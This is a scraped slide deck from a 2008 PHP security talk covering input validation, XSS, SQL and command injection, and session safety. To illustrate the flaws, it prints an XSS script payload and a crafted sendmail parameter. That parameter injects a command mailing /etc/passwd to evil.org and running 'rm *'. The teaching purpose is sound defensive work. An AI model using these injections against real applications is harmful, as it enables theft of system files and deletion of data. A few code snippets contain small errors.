Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Php security

Presented this on PHPCAMP pune, 2008

  • Login to see the comments

Php security

  1. 1. PHP Security by Uttam KUmar Email:- trickyuk001@gmail.com Mobile:- 8149253187
  2. 2. What is Security? measurement… safety… protection…
  3. 3. Secure Web Applications web security issues have to do with: – hacker attacks • denial of service • server hijacking – common threats – compromise of data
  4. 4. PHP & Security a growing language… a major concern…
  5. 5. Never trust the web… Input data validation – register_globals = OFF – $_REQUEST[] big NO NO … – type casting input data • No isNumeric() if data is numeric [locale problem] • regularExp if data is string – Path validation • Always use basename()
  6. 6. Never trust the web… • Content size validation – use server side max length validation – File Upload • Check destination file size with $_FILES[‘name’][‘size’] • I think Browser MIME header is reliable right ? – Use getImageSize() in case of image • External source upload like Avtar – Make a local copy if path/of/file submitted from a URL.
  7. 7. XSS attack – Can lead to embarrassment. – Session take-over. – Password theft. – User tracking by 3rd parties
  8. 8. XSS attack Prevention is better than cure – Use striptags() • No tag allowance please – Use htmlentities() – Is $_SERVER safe ? • Can be set… • Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo • $_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo; • $_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo – IP based info • Use HTTP_X_FORWARDED_FOR • Use long2ip() – $aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]); – $sValidIp = long2ip(ip2long(array_pop($ipss)));
  9. 9. SQL Injection WWW – Arbitrary query execution – Removal of data. – Modification of existing values. – Denial of service. – Arbitrary data injection.
  10. 10. Preventing SQL injection • Are magic quotes enough? – use mysql_real_escape_string() – use prepared statements – avoid omitting single quotes – LIKE quandary need addslashes() – avoid printing query – Authentication data storage • Encrypt sensitive data to access database • Make sure it’s only loaded for certain VirtualHost
  11. 11. Authentication Data Storage SetEnv DB_LOGIN “login” SetEnv DB_PASSWD “password” Set Env DB_HOST “127.0.0.7” <virtualHost iila.ws> include /home/illa/sql.conf </virtualHost> $_SERVER[‘DB_LOGIN’] $_SERVER[‘DB_PASSWD’] /home/illa/sql.conf Apache server configuration PHP file Better Approach is to set these things under php’s ini directives use php_admin_value mysql.default.user. “login”
  12. 12. Preventing code injection – Path validation – Validate fileName $sFile = “D’sozaRes.doc’; basename($sFile); //will return D’sozaRes.doc on *nix system basename($sFile); //will return ’sozaRes.doc on win32 • Remove slashes • Keep white list of file name • Use full path – Avoid variables in eval() – Avoid using variable passed by users for regEx.
  13. 13. Command injection – Use escapeshellcmd() and escapeshellarg() – Use full path for command – Set prority and memory limit for command • shell_exec(“ulimit –t 20 –m 20000; /usr/bin/php test.php”);
  14. 14. Calling External Programs <?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?> The user could control $to to yield: http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A which would result in running the command: /usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm * a solution would be: $fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);
  15. 15. Securing sessions • Weakness of session – Server side weakness… • ls –l /tmp/sess_* //can reveal session info – URL session exploitation • Solution – Native protection. – Mixing security and convenience. – Securing session storage path – Check browser signature – Referrer validation
  16. 16. Questions…????
  17. 17. Thank You !!

×